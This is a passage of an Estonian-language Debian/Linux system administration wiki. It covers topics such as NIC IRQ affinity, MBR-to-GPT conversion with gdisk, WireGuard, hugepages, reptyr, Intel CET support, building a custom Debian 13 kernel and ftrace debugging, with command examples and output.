PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===ConsoleKit===

2017 seisuga paistab see olevat vananenud tehnoloogia, kasutatakse systemd-logind.

Kasulikud lisamaterjalid

* TODO

===Võrgukaart - CPU affinity===

TODO

Järgneval viisil tegutsemiseks on vaja ircbalance deemoni töö lõpetada

# systemctl stop irqbalance

Võrgukaardi multi-queue omadused

<pre>
# ethtool -l eth0
Channel parameters for eth0:
Pre-set maximums:
RX: 8
TX: 8
Other: 0
Combined: 0
Current hardware settings:
RX: 2
TX: 2
Other: 0
Combined: 0
</pre>

Võrgukaardi ja cpu ja interrupt vahelised seosed

<pre>
# cat /proc/interrupts | egrep "CPU|eth"
CPU0 CPU1 CPU2 CPU3 CPU4 CPU5 CPU6 CPU7
48: 0 0 0 38 0 1339257 461106 0 PCI-MSI 2097152-edge eth0-0
49: 0 0 1 67 2071270 0 0 143901 PCI-MSI 2097153-edge eth0-1
57: 0 0 1738287 4 0 0 0 0 PCI-MSI 2099200-edge eth1-0
58: 0 3918708 0 38 0 0 0 0 PCI-MSI 2099201-edge eth1-1
</pre>

kus

* 48, 49 jnt on interrupt number

<pre>
# cat /proc/irq/57/smp_affinity
04
</pre>

kus

* hex 04 vastav väärtus on bin 0000 0100
* bin väärtuses olev paremalt kolmandal positsioonil olev '1' tähistab süsteemis olevat kolmandat protsessorit, st alates nullist lugedes CPU2

Affinity muutmiseks, st selle muutmiseks, milline cpu tegeleb millise võrgukaardiga (või võrgukaardi queue'ga) sobib öelda uus cpu number, nt seostamiseks CPU3 protsessoriga

# echo 08 > /proc/irq/57/smp_affinity

CPU numeratsioon

* 0000 0001 (bin) ehk 01 (hex) - esimene (CPU0)
* 0000 0010 (bin) ehk 02 (hex) - teine (CPU1)
* 0000 0100 (bin) ehk 04 (hex) - kolmas (CPU2)
* ...
* 1000 0000 (bin) ehk 80 (hex) - kahesas (CPU7)

Tundub, et võrgukaardi queue'de arvu muutmiseks sobib öelda

# ethtool -L eth0 tx 2
# ethtool -L eth0 rx 2

Siin kirjeldatud viisil tehtud seadistused ei kehtestu peale rebooti.

===Watchdog===

TODO

Kasulikud lisamaterjalid

* https://github.com/miniwark/miniwark-howtos/wiki/Hardware-Watchdog-Timer-setup-on-Ubuntu-12.04
* http://odroid.com/dokuwiki/doku.php?id=en:odroid_linux_watchdog
* https://pve.proxmox.com/wiki/High_Availability
* https://pve.proxmox.com/wiki/High_Availability_Cluster_4.x
* https://lesterlo.wordpress.com/2017/06/23/enable-ipmi-watchdog/
* http://www.madore.org/~david/linux/iTCO-wdt-test.html
* https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/virtualization_administration_guide/section-libvirt-dom-xml-watchdog
* https://casesup.com/using-the-nmi-watchdog-to-detect-hangs/
* https://gist.githubusercontent.com/wmealing/5523247/raw/4dc0474cabc35a9b79cd49fc7eab1f027ea80606/nmi-interrupts.txt
* https://github.com/spotify/linux/blob/master/Documentation/nmi_watchdog.txt

===Softdog===

TODO

===Misc===

* Kopeerimise kiiruse kontrollimine pipe peal

# apt-get install pv
# ssh root@192.168.112.113 'cd /tmp && dd if=/dev/pve/vm-109-disk-1 bs=1M' | pv -L 15m | dd of=/dev/kvmvg/vm-1019-disk-1 bs=1M

===Viber===

Viber https://www.viber.com/ on suhtlemistarkvara, paigaldamiseks sobib öelda nt Debian v. 8 ja v. 9 keskkonnas

# apt-get install libxcb-xkb1 libxcb-icccm4 libxcb-image0 libxcb-render-util0
# apt-get install libqt5gui5
# dpkg -i viber.com

ja käivitamiseks

$ /opt/viber/Viber

Kasulikud lisamaterjalid

* https://daksaitay.noblogs.org/post/2017/01/17/viber-on-debian-8-jessie-desktop/
* http://www.roydoer.com/viber-on-ubuntu-14-04-64bit/

===KeePassX===

MÄRKUS 20190126 - tundub, et õigem projekt on https://en.wikipedia.org/wiki/KeePassXC (C nagu community ja paketinimi keepassxc)

# apt-get intall keepassx

andmebaasi failinime lõpp on .kdbx

===Password Gorilla===

# apt-get install password-gorilla

andmebaasi failinime lõpp on .psafe3

===2018 - Debian v. 9 Stretch paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===2019 - Debian v. 10 Buster paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===linux-perf===

====Paigldamine====

Paigaldamiseks sobib öeld

# apt-get install linux-perf

====Kasutamine====

perf.data faili salvestamine käesolevasse kataloogi

# /usr/bin/perf record -e sched:sched_process_exec -a

Salvestatud andmete loetaval kujul esitamine

# /usr/bin/perf script --header

====Kasulikud lisamaterjalid====

* http://www.brendangregg.com/perf.html

===Wireguard===

====Debian v. 10 Buster====

TODO

Lisada buster-backports repo

TODO

Paigaldada buster-backports repost wireguard

kus

* paigaldatakse wireguard-dkms wireguard-tools wireguard
* paigaldatakse hulka bui

====Debian v. 11 Bullseye====

# apt-get install wireguard

====Debian v. 12 Bookworm====

Töötamine paistab nö serveri poolel

<pre>
root@debian-vpn:~# systemctl status wg-quick@wg0
● wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0
Loaded: loaded (/lib/systemd/system/wg-quick@.service; enabled; preset: enabled)
Active: active (exited) since Tue 2025-04-01 16:46:09 EEST; 9 months 19 days ago
Docs: man:wg-quick(8)
man:wg(8)
https://www.wireguard.com/
https://www.wireguard.com/quickstart/
https://git.zx2c4.com/wireguard-tools/about/src/man/wg-quick.8
https://git.zx2c4.com/wireguard-tools/about/src/man/wg.8
Main PID: 7536 (code=exited, status=0/SUCCESS)
CPU: 30ms

Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip link set mtu 1420 up dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.68/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.170/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.15/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.14/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.13/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.12/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.11/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.10/32 dev wg0
Apr 01 16:46:09 debian-10-vpn systemd[1]: Finished wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0.
</pre>

Seadistusfail

<pre>
/etc/wireguard/wg0.conf
</pre>

===MBR -> GPT partitsioonitabeli teisendamine===

====Tööpõhimõte====

* MBR partitsioonitabel hõlvab tavalisel lihtsal juhul plokkseadme esimsesed 512 Baiti
* GPT partitsioonitabel hõlvab tavaliselt plokkseadme esimsed ja viimased 34 * 512 Baiti
* tundub, et seoses uuema ajal 1 MBait piirile asjade sättimisega algab nii MBR kui GPT puhul esimene partitsioon 2048'ndal sektoril; st plokkseadme alguses on rikkalikult vaba ruumi teisendatud gpt jaoks; probleemiks võib olla, plokkseadme lõpus pole piisavalt vaba ruumi backup gpt jaoks
* sektori suurus on 512 Baiti
* MBR partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 16 baiti, millest 4 baiti ehk 16 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^32*512/1024^3 | bc -> 2048 Gigabyte)
* GPT partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 128 baiti, millest 8 baiti ehk 64 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^64*512/1024^3 | bc -> väga palju)
* muudatuse käigus partitsioone moodustavaid plokke plokkseadmel ümber ei paigutata
* kui mbr partitsioonitabelis on kasutusel ainult primaarsed partitsioonid ning ilma nö aukudeta partitsioonide vahel, siis on tulemuseks samuti ilma aukudeta üksteisele järgnevad gpt partitsioonid
* antud tekst ei kästile seda, aga boot kood asub mbr puhul esimeses 446 baidis
* gpt puhul põhimõtteliselt boot koodi ei ole kasutusel uefi põhises süsteemis (kasutatakse efi partitsiooni)

====Teisendamine====

Olgu lähtepunktiks selline plokkseadme kasutus, mbr partitsioonitabel

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xdaa60afa

Device Boot Start End Sectors Size Id Type
/dev/vdc1 2048 33097727 33095680 15.8G 83 Linux
</pre>

ning partitsioonil üks ext4 failisüsteem, mis on monteeritud

<pre>
# df -h -T /dev/vdc1
Filesystem Type Size Used Avail Use% Mounted on
/dev/vdc1 ext4 16G 1.7G 13G 12% /mnt/vdc1
</pre>

Eesmärk on teisendada partitsioonitabel gpt kujule säilitades seejuures failisüsteemi sisu. Selleks sobib kasutada sellist protseduuri, esmalt monteerida failisüsteem lahti

# umount /dev/vdc1

seejärel teha mbr partitsioonitabelist varukoopia

# dd if=/dev/vdc of=backup.mbr bs=512 count=1

gdisk ehk 'gpt fdisk' programm sobib gpt partitsioonitabeli haldamiseks, sealhulgas vaikimisi ta püüab mbr partitsioonitabeli teisendada gpt kujule. See on tehniliselt tavaliselt võimalik kuna mbr asub plokkseadme alguses ja seal on nö kasutamata ruumi.

<pre>
# gdisk /dev/vdc
GPT fdisk (gdisk) version 0.8.10

Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present

***************************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format
in memory. THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by
typing 'q' if you don't want to convert your MBR partitions
to GPT format!
***************************************************************

Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/vdc.
The operation has completed successfully.
</pre>

kus

* programm tuvastab esmalt, et plokkseadmel on kasutusel MBR partitsioonitabel
* w abil tehakse muudatus
* Y abil kirjutatakse muudatus üles

Kuna Linux operatsioonisüsteemi puhul eristatakse plokkseadmel ja mälus olevat seisu plokkseadme kasutusest, siis tuleks täielikuks muudatuse kehtestamiseks teha lihtsalt reboot arvutile või öelda

# partprobe /dev/vdc

Tulemusena kasutatakse plokkseadmel gpt partitsioonitabelit

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 469E6D74-0022-4200-B0FD-2C5FAED7DCAD

Device Start End Sectors Size Type
/dev/vdc1 2048 33302527 33300480 15.9G Linux filesystem
</pre>

====Muudatuse tagasivõtmine====

Muudatuse tagasivõtmiseks sobib öelda (kuigi nii jääb alles plokkseadme lõppu gpt backup; teatud bios'ide puhul võib see tekitada probleeme, bios on agar ja taastab selle alusel primaarse gpt partitsioonitabeli)

# umount /mnt/vdc1
# dd if=backup.mbr of=/dev/vdc bs=512 count=1
# partprobe /dev/vdc
# mount /dev/vdc1 /mnt/vdc1

====Kasulikud lisamaterjalid====

* https://easylinuxji.blogspot.com/2018/12/what-is-disk-partitioning-disk.html
* https://dannyda.com/2021/05/07/how-to-convert-ubuntu-20-04-1-lts-os-disk-from-mbr-to-gpt-gpt-to-mbr-without-losing-data/
* http://www.rodsbooks.com/gdisk/mbr2gpt.html

===Kasutajakonto operatsioonid===

Konto lukustamine kusjuures see takistab ainult parooliga autentimist, nt ssh võtmega saab sisse

# passwd -l kasutajanimi
# passwd -u kasutajanimi

Konto expire, see takistab igasuguseid kanaleid (eeldab, et pam vms on seadistatud expirega tegelema)

# usermod --expiredate 1 kasutajanimi

===grep kasutamine===

Perl regulaaravalidsega

<pre>
TODO
</pre>

Järjestikulised grep'id ei toimi vahel, aitab nt

<pre>
# tail -f /var/log/pveproxy/access.log | grep --line-buffered "PUT" | grep --line-buffered firewall | grep --line-buffered option
</pre>

===Debian v. 12 ext4 failisüsteem read-only olekus===

Tundub, et kõige tavalisem Debian v. 12 paigaldus, mis kasutab ext4 failisüsteemi (lvm kihi peal) käitub read-only olekus selliselt, et avatud failidesse mingil määral näiliselt kirjutamised jätkuvad. Seejuures kirjutajale jääb mulje, et kirjutamine õnnestus lõpetada edukalt. (Samal ajal uusi faile ei saa tekitada, olemasolevate failide muutmisi ei saa alustada.) Nähtuse jälgimiseks-taaskordamiseks-esilekutsumiseks sobib selline protseduur

1. Proxmox PVE keskkonnas töötab lvm põhisel storage'l Debian v. 12 virtuaalne arvuti; arvutis on kasutusel lvm ja sellel ext4 failisüsteem (lvm ei ole oluline)

2. Alustatakse eemalt pv abil piiratud kiirusega faili kopeerimist (etteruttavalt on siin toodud ära ka kopeeriv cat programmi edukas exit code; fail.img-4 on 36 MB suur)

$ cat fail.img-4 | ssh root@192.168.110.246 'pv -q -L3500K | cat > /root/tere4; echo $?'
0

3. umbes kolmveerandi kopeerimise pealt viiakse PVE host peal virtuaalsele arvutile vastav plokkseade read-only olekusse

# lvchange -pr vg_data/vm-615-disk-2

4. ootus on, et virtuaalne arvuti reageerib sellele oma juurfailisüsteemi read-only olekusse lülitamisega

5. ootus on, et kopeerimine lõpeb edukalt

6. ootus on, et vaatamata read only olekule Debian operatsioonisüsteemi saab veel natuke kasutada, ja küsida (tulemus klapib orig fail.img-4 failiga)

# sha256sum /root/tere4

7. virtuaalne arvuti stop'itakse PVE abil

8. viiakse plokkseade tagasi rw režiimi

# lvchange -prw vg_data/vm-615-disk-2

9. käivitatakse virtuaalne arvuti

10. kõnealune fail, mis näiliselt õnnestus edukalt kopeerida, on väiksema suurusega (või suurusega null)

Märkused

* analoogselt käitub Ubuntu v. 22.04
* Ubuntu v. 22.04 (ja tõenäoliselt Debian v. 12) + ext3 failisüsteem nö hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* Vanemad Ubuntu ja Debian versioonid hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* PVE host peal lvchange ütlemisele alternatiiviks on virtuaalse arvuti siseselt öelda

# echo u > /proc/sysrq-trigger

* lisaks PVE keskkonnale toimub analoogiline nähtus vmware virtuaalse arvutiga

===machine-id reset===

<pre>
# rm /etc/machine-id /var/lib/dbus/machine-id
# dbus-uuidgen | tee /etc/machine-id > /var/lib/dbus/machine-id
# chmod 0444 /etc/machine-id
# ls -ld /etc/machine-id /var/lib/dbus/machine-id
-r--r--r-- 1 root root 33 Apr 7 19:18 /etc/machine-id
-rw-r--r-- 1 root root 33 Apr 7 19:18 /var/lib/dbus/machine-id
</pre>

===Hugepages===

* TLB - Translation Lookaside Buffer
* THP - Transparent Huge Pages

Nö tavalises proxmox pve arvutis on selline hugepagendus

<pre>
root@pm60-trt:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
</pre>

Tundub, et niipea kui käivitatakse virtuaalne arvuti, mis sisaldab parameetrit 'hugepages: ...' tekitatakse kaks juurde

<pre>
root@valgustaja1:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
hugetlbfs 0 0 0 - /run/hugepages/kvm/2048kB
hugetlbfs 0 0 0 - /run/hugepages/kvm/1048576kB
</pre>

ning seda tehakse läbi nö käigult konstrueeritud systemd mount unitite

<pre>
root@valgustaja1:~# systemctl | grep huge
dev-hugepages.mount loaded active mounted Huge Pages File System
run-hugepages-kvm-1048576kB.mount loaded active mounted /run/hugepages/kvm/1048576kB
run-hugepages-kvm-2048kB.mount loaded active mounted /run/hugepages/kvm/2048kB
</pre>

Üks viis 1G hugepagendust lähtestada on kasutades sellist kernel-command-line'i

<pre>
root@valgustaja1:~# cat /proc/cmdline
initrd=\EFI\proxmox\6.8.8-2-pve\initrd.img-6.8.8-2-pve root=ZFS=rpool/ROOT/pve-1 boot=zfs default_hugepagesz=1G hugepagesz=1G hugepages=24
</pre>

Tulemusena paistab

<pre>
root@valgustaja1:~# grep -i huge /proc/meminfo
AnonHugePages: 0 kB
ShmemHugePages: 0 kB
FileHugePages: 0 kB
HugePages_Total: 24
HugePages_Free: 24
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 1048576 kB
Hugetlb: 25165824 kB
</pre>

ning

<pre>
root@valgustaja1:~# hugeadm --explain
Total System Memory: 192906 MB

Mount Point Options
/dev/hugepages rw,relatime,pagesize=1024M
/run/hugepages/kvm/2048kB rw,relatime,pagesize=2M
/run/hugepages/kvm/1048576kB rw,relatime,pagesize=1024M

Huge page pools:
Size Minimum Current Maximum Default
2097152 0 0 0
1073741824 24 24 24 *

Huge page sizes with configured pools:
1073741824

...
</pre>

Kasulikud lisamaterjalid

* https://wiki.postgresql.org/images/7/7d/PostgreSQL_and_Huge_pages_-_PGConf.2019.pdf
* https://pganalyze.com/blog/5mins-postgres-tuning-huge-pages

===reptyr===

reptyr ehk reparenting-terminal võimaldab saada uuesti kontakti kaotatud kuid eksisteeriva terminaliga. Paigaldamiseks sobib öelda

# apt-get install reptyr

Nt apt-get dist-upgrade programm käivitati, aga füüsiline konsool millelt seda tehti riknes. Mujalt arvutisse logides võib olla dist-upgrade tegevus peatunud nt sellises kohas

<pre>
# tail -f /var/log/apt/term.log
...
No DKMS packages installed: not changing Secure Boot validation state.
Setting up libmpc3:amd64 (1.3.1-1) ...
Setting up systemd-timesyncd (252.30-1~deb12u2) ...

Configuration file '/etc/systemd/timesyncd.conf'
==> Modified (by you or by a script) since installation.
==> Package distributor has shipped an updated version.
What would you like to do about it ? Your options are:
Y or I : install the package maintainer's version
N or O : keep your currently-installed version
D : show the differences between the versions
Z : start a shell to examine the situation
The default action is to keep your current version.
*** timesyncd.conf (Y/I/N/O/D/Z) [default=N] ?
</pre>

Ning terminali olukord

<pre>
root@tm-tartu-x470:~# ps auxf | less -N
..
135 root 1097 0.0 1.8 74500 18448 ? S Oct13 0:05 apt-get dist-upgrade
136 root 23408 0.0 0.6 11768 6388 pts/1 Ss+ Oct13 0:01 \_ /usr/bin/dpkg --status-fd 25 --configure --
...
</pre>

Osutub, et terminaliga saab taas kontakti öeldes, ja jätkates seejärel sisestusi peatunud kohast. NB! reptyr töötamine jätkub nö pimedast kohast, klaviatuurilt tuleb sisestada nii nagu asjakohane, nt antud juhul Enter sobib küsimusele 'timesyncd.conf (Y/I/N/O/D/Z) [default=N]' eitavalt vastamiseks

<pre>
root@tm-tartu-x470:~# /home/imre/reptyr 23408
[-] Timed out waiting for child stop.

Setting up libevent-core-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libatomic1:amd64 (12.2.0-14) ...
Setting up libvariable-magic-perl (0.63-1+b1) ...
Setting up udev (252.30-1~deb12u2) ...
Setting up libevent-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libio-html-perl (1.004-3) ...
Setting up libss2:amd64 (1.47.0-2) ...
Setting up libpod-parser-perl (1.65-1) ...
Setting up autopoint (0.21-12) ...
Setting up libb-hooks-op-check-perl:amd64 (0.22-2+b1) ...
</pre>

Seejärel jätkub apt-get dist-upgrade osakonnaga suhtlemine tavalisel viisil.

===CET - Intel Control-flow Enforcement Technology===

Protsessori tugi

<pre>
root@pve-01:~# lscpu | grep -i shstk
Flags: fpu vme de pse ... user_shstk ...
</pre>

ning nt https://www.intel.com/content/www/us/en/products/sku/232391/intel-xeon-gold-6448h-processor-60m-cache-2-40-ghz/specifications.html

<pre>
Intel® Control-Flow Enforcement Technology
</pre>

Kerneli tugi

<pre>
root@pve-01:~# grep SHADOW /boot/config-6.8.4-3-pve
CONFIG_X86_USER_SHADOW_STACK=y
</pre>

programmi tugi, 'Properties: x86 feature: IBT, SHSTK'

<pre>
root@trainer-01-rws:~# readelf -n /usr/sbin/sshd

Displaying notes found in: .note.gnu.property
Owner Data size Description
GNU 0x00000020 NT_GNU_PROPERTY_TYPE_0
Properties: x86 feature: IBT, SHSTK
x86 ISA needed: x86-64-baseline

Displaying notes found in: .note.gnu.build-id
Owner Data size Description
GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: 652d8ffe728a6800d02ee146e82201f0080069de

Displaying notes found in: .note.ABI-tag
Owner Data size Description
GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag)
</pre>

käesolev olukord

<pre>
root@pve-01:~# cat /proc/2266/status | grep -i thread_fe
x86_Thread_features:
x86_Thread_features_locked:
</pre>

Kasulikud lisamaterjalid

* https://en.wikipedia.org/wiki/Control-flow_integrity
* https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-24-04-lts

===pigz abil pakkimine===

# time tar -I pigz -cf ../20250507/rakendus-14-main_ee-20250507.tgz main_ee

===Debian v. 13 Trixie kerneli kompileerimine===

Väited

* tegevused toimuvad pve v. 8.4 virtuaalses arvutis, uefi jne
* kompileerimiseks on vajalik ca 40 G ruumi failisüsteemis
* arvutil on 32 cpu ja 24g mälu
* kompileerimine võtab aega ca 10 minutit

Nt eesmärgiga lisada süsteemi rtc_efi tuuma moodul ning käivitamisel lülitada välja rtc_cmos moodul, tavaliselt paistab rtc nii

<pre>
root@pm60-trt:~# dmesg | grep rtc
[ 5.472677] rtc_cmos 00:01: RTC can wake from S4
[ 5.477720] rtc_cmos 00:01: registered as rtc0
[ 5.482245] rtc_cmos 00:01: setting system clock to 2025-07-05T17:49:27 UTC (1751737767)
[ 5.490391] rtc_cmos 00:01: alarms up to one month, y3k, 114 bytes nvram
</pre>

Kompileerimine

<pre>
# apt-get install build-essential libncurses-dev
# apt-get build-dep linux
# linux-source-6.12

# su - imre
$ mkdir 20251001
$ cd 20251001
$ tar xaf /usr/src/linux-source-6.12.tar.xz
$ cd linux-source-6.12
</pre>

Kostümiseerimine

<pre>
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ cp /boot/config-6.12.48+deb13-amd64 .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe drivers/rtc/Kconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig

imre@kernel-deb-13-01:~/20251001-2/linux-source-6.12$ diff /boot/config-6.12.48+deb13-amd64 .config
5c5
< CONFIG_CC_VERSION_TEXT="x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0"
---
> CONFIG_CC_VERSION_TEXT="gcc (Debian 14.2.0-19) 14.2.0"
36a37
> CONFIG_BUILD_SALT=""
999a1001
> CONFIG_MODULE_SIG_ALL=y
8486c8488
< CONFIG_RTC_DRV_CMOS=y
---
> CONFIG_RTC_DRV_CMOS=m
8492a8495
> CONFIG_RTC_DRV_EFI=m
10868a10872
> CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
10870a10875
> CONFIG_SYSTEM_TRUSTED_KEYS=""

imre@kernel-deb-13-01:~$ diff orig/linux-source-6.12/drivers/rtc/Kconfig 20251001/linux-source-6.12/drivers/rtc/Kconfig
1180c1180
< depends on EFI && !X86
---
> depends on EFI

imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make -j 32 bindeb-pkg
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# ls -ld /home/imre/20251001/linux-*
-rw-r--r-- 1 imre imre 9175852 Oct 2 00:07 /home/imre/20251001/linux-headers-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 109643260 Oct 2 00:07 /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 999103852 Oct 2 00:08 /home/imre/20251001/linux-image-6.12.48-dbg_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 1395812 Oct 2 00:06 /home/imre/20251001/linux-libc-dev_6.12.48-2_amd64.deb
-rw-rw-r-- 1 imre imre 6109 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.buildinfo
-rw-rw-r-- 1 imre imre 2260 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.changes
</pre>

Paigaldamine

<pre>
root@kernel-deb-13-01:~# dpkg -i /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb

root@kernel-deb-13-01:~# find /lib/modules/6.12.48 -name rtc-efi\* -ls
559702 8 -rw-r--r-- 1 root root 4708 Oct 2 00:05 /lib/modules/6.12.48/kernel/drivers/rtc/rtc-efi.ko.xz
</pre>

Kasutamine, nt grub bootloaderisse sekkumisel näidata

<pre>
linux /boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
initrd /boot/initrd.img-6.12.48
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# uname -a
Linux kernel-deb-13-01 6.12.48 #2 SMP PREEMPT_DYNAMIC Thu Oct 2 00:05:59 EEST 2025 x86_64 GNU/Linux

root@kernel-deb-13-01:~# dmesg -T | grep rtc
[Thu Oct 2 00:11:10 2025] Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:10 2025] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: registered as rtc0
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: setting system clock to 2025-10-01T21:11:09 UTC (1759353069)

root@kernel-deb-13-01:~# hwclock --show
2025-10-02 01:35:16.360299+03:00
</pre>

Kasulikud lisamaterjalid

* 'Building a custom kernel from Debian kernel source' - https://kernel-team.pages.debian.net/kernel-handbook/ch-common-tasks.html#s-common-building

===Kerneli siseste funktsioonide debugimine===

Sedasi saab veenduda, et hwclock kasutab peale eelmises punktis tehtud muudatuse 'efi runtime services' osakonda (mitte klassikalist rfc_cmos osakonda)

<pre>
root@kernel-deb-13-01:/sys/kernel/tracing# cat /sys/kernel/tracing/available_filter_functions | grep efi_ | grep time
root@kernel-deb-13-01:/sys/kernel/tracing# cd /sys/kernel/tracing
root@kernel-deb-13-01:/sys/kernel/tracing# echo > trace
root@kernel-deb-13-01:/sys/kernel/tracing# echo nop > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo efi_read_time > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo function > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo 1 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# hwclock --show & echo "before $! after"
[1] 1525
before 1525 after
root@kernel-deb-13-01:/sys/kernel/tracing# 2025-10-02 03:05:13.888490+03:00

[1]+ Done hwclock --show

root@kernel-deb-13-01:/sys/kernel/tracing# echo 0 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# cat trace | head -n 15
# tracer: function
#
# entries-in-buffer/entries-written: 1458/1458 #P:32
#
# _-----=> irqs-off/BH-disabled
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / _-=> migrate-disable
# |||| / delay
# TASK-PID CPU# ||||| TIMESTAMP FUNCTION
# | | | ||||| | |
hwclock-1525 [003] ..... 10443.012235: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012346: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012425: efi_read_time <-__rtc_read_time
</pre>

kus

* hwclock käsk antakse ja küsitakse tema pid väärtust
* trace failis on fikseeritud pid mis oli seotud efi_read_time funktsiooni väljakutsumisega

===netconsole===

TODO

===Kasulikud lisamaterjalid===

* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* http://www.debian.org/security/
* http://www.debian-administration.org/
* http://wiki.debian.org/
